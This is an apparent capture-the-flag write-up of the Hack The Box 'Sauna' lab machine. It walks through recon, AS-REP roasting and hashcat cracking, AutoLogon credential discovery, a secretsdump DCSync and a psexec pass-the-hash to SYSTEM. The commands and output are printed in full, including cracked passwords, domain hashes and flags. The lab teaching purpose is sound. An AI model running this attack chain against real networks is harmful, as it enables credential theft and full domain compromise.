6 minutes
Hack the Box :: Sauna
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Machine info
Traverxec [by egotisticalSW
]
IP: 10.10.10.175
OS: Windows
Difficulty: Easy
Release: 15 Feb 2020
Retired: TBD
Recon
Nmap
As usual we kick off with a nmap scan of the box
$ nmap -v -sV -sC -oA scans/nmap_sauna 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.083s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: "Egotistical Bank :: Home"
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-14 04:55:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/13%Time=5E94D0FD%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h02m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-04-14T04:57:25
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 13 22:56:35 2020 -- 1 IP address (1 host up) scanned in 301.13 seconds
OK, there are some interesting services here:
- DNS (bind)
- HTTP (IIS 10.0)
- Kerberos
- SMB
- LDAP
SMB
Let’s try to enumerate SMB shares as Guest (since we don’t have any creds, yet).
$ sudo smbmap -L -H 10.10.10.175 -u guest
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCOUNT_DISABLED(The referenced account is currently disabled and may not be logged on to.)
[!] Authentication error on 10.10.10.175
No luck here.
LDAP
Let’s enumerate LDAP.
$ nmap -v -sV --script ldap* -p 389 -oA scans/nmap_sauna_ldap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.045s latency).
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
| ldap-brute:
| root:<empty> => Valid credentials
| admin:<empty> => Valid credentials
| administrator:<empty> => Valid credentials
| webadmin:<empty> => Valid credentials
| sysadmin:<empty> => Valid credentials
| netadmin:<empty> => Valid credentials
| guest:<empty> => Valid credentials
| user:<empty> => Valid credentials
| web:<empty> => Valid credentials
|_ test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
| <ROOT>
[...]
| serverName: CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
[...]
| ldap-search:
| Context: DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: DC=EGOTISTICAL-BANK,DC=LOCAL
[...]
| name: EGOTISTICAL-BANK
[...]
| dc: EGOTISTICAL-BANK
| dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
|_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
We find the user Hugo Smith and the domain name egotistical-bank.local.
HTTP
Let’s have a look at the website as well.
There’s nothing really interesting on the site, except for the About page.
We could try to make a userlist from the names on this page. Perhaps we find one or more valid usernames?
Typical username formats are first.last or f.last.
$ cat findings/users.txt
fsmith
hbear
skerb
scoins
btaylor
sdriver
fergus.smith
hugo.bear
steven.kerb
shaun.coins
bowie.taylor
sophie.driver
Initial foothold
Kerberos Ticket Granting Tickets (TGT)
Let’s test our list of (potential) usernames and extract TGT to crack.
$ /opt/impacket/examples/GetNPUsers.py
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE]
[-format {hashcat,john}] [-usersfile USERSFILE] [-debug]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address]
target
Queries target domain for users with 'Do not require Kerberos
preauthentication' set and export their TGTs for cracking
$ /opt/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile findings/users.txt -outputfile findings/hash.txt -dc-ip 10.10.10.175
$ cat findings/hash.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:36dff4a5bb03d0af2ac79d3e801634e3$06ec21d9b686ea6e5b8e9b04753f576fd97c366a94087d1fe7b83122668508301ad131f4e51185a6254ffe8ae6c7587252392046dec2336398d44bc1fb34ada25f71b52682b8921fcd1254d01d3e8dc48db0c6f864d43c3f88c34580fdd6e0789d521fccbb40d3d20eec877dfd37f851681edeafb14c494134ef4e3853a9f52441416b368088482be02adecb1905514a10aa98efeb75f9bf431606a720742d6fda29e124f3ab4744dd9df72fa134ab0bc8414b720a6a3ea4532a71432748470912c59c0048b0d13181939ec0813e42efff4680fb47aff623d3e0c757b0a195eab08b5dbbd430b14e233338758f8020cabb784f4576f4e9e42d0f327d55430fa3
Looks like we discovered the username fsmith and managed to get a TGT.
Cracking this ticket, we get the password Thestrokes23
$ hashcat -a 0 -m 18200 findings/hash.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:36dff4a5bb03d0af2ac79d3e801634e3$06ec21d9b686ea6e5b8e9b04753f576fd97c366a94087d1fe7b83122668508301ad131f4e51185a6254ffe8ae6c7587252392046dec2336398d44bc1fb34ada25f71b52682b8921fcd1254d01d3e8dc48db0c6f864d43c3f88c34580fdd6e0789d521fccbb40d3d20eec877dfd37f851681edeafb14c494134ef4e3853a9f52441416b368088482be02adecb1905514a10aa98efeb75f9bf431606a720742d6fda29e124f3ab4744dd9df72fa134ab0bc8414b720a6a3ea4532a71432748470912c59c0048b0d13181939ec0813e42efff4680fb47aff623d3e0c757b0a195eab08b5dbbd430b14e233338758f8020cabb784f4576f4e9e42d0f327d55430fa3:Thestrokes23
User flag
We can use these credentials to login onto the box.
$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf
Privilege escalation
Enumerate
Let’s enumerate a bit further.
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
We find more usernames: HSmith, svc_loanmgr and (of course Administrator).
We can also use winPEAS
to collect more information.
Upload the .exe to the box and run it.
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /opt/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe
Info: Uploading /opt/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe to C:\Users\FSmith\Documents\winPEAS.exe
Data: 321536 bytes of 321536 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winPEAS.exe
[...]
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
[+] Home folders found(T1087&T1083&T1033)
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\FSmith
C:\Users\Public
C:\Users\svc_loanmgr
[+] Looking AppCmd.exe()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials
[+] Checking for DPAPI Master Keys()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
MasterKey: C:\Users\FSmith\AppData\Roaming\Microsoft\Protect\S-1-5-21-2966785786-3096785034-1186376766-1105\ca6bc5b5-57d3-4f19-9f5a-3016d1e57c8f
Accessed: 1/24/2020 6:30:19 AM
Modified: 1/24/2020 6:30:19 AM
[+] Looking for common SAM & SYSTEM backups()
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\SYSTEM
We find a potential password for svc_loanmanager: Moneymakestheworldgoround!.AppCmd.exe was discovered as well, but none of the techniques seemed to work.
There’s also a DPAPI Master Key, which we could ‘attack’ with mimikatz
.
Hashdump
Let’s try the credentials we found to do a hashdump.
$ /opt/impacket/examples/secretsdump.py
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
usage: secretsdump.py [-h] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
[-security SECURITY] [-sam SAM] [-ntds NTDS]
[-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
[-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
[-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
[-pwd-last-set] [-user-status] [-history]
[-hashes LMHASH:NTHASH] [-no-pass] [-k]
[-aesKey hex key] [-dc-ip ip address]
[-target-ip ip address]
target
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
$ /opt/impacket/examples/secretsdump.py EGOTISTICAL-BANK/svc_loanmgr@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:87408da437fc482b3d33f8846565ca96:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:60519d04845ef6658c94529aa8fc8220f868f0f4472f49ac8752b04d0ecaecc5
SAUNA$:aes128-cts-hmac-sha1-96:a3364c8713207d94239da98ecb4483b3
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...
Pass-the-Hash
We find a hash for the Administrator account, we can use this in a Pass-the-Hash attack.
$ /opt/impacket/examples/psexec.py
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
usage: psexec.py [-h] [-c pathname] [-path PATH] [-file FILE] [-debug]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address] [-target-ip ip address]
[-port [destination port]] [-service-name service name]
target [command [command ...]]
PSEXEC like functionality example using RemComSvc.
$ /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175 cmd.exe
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file KHHXRiQe.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service EnTK on 10.10.10.175.....
[*] Starting service EnTK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Root flag
TADA
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
f3ee04965c68257382e31502cc5e881f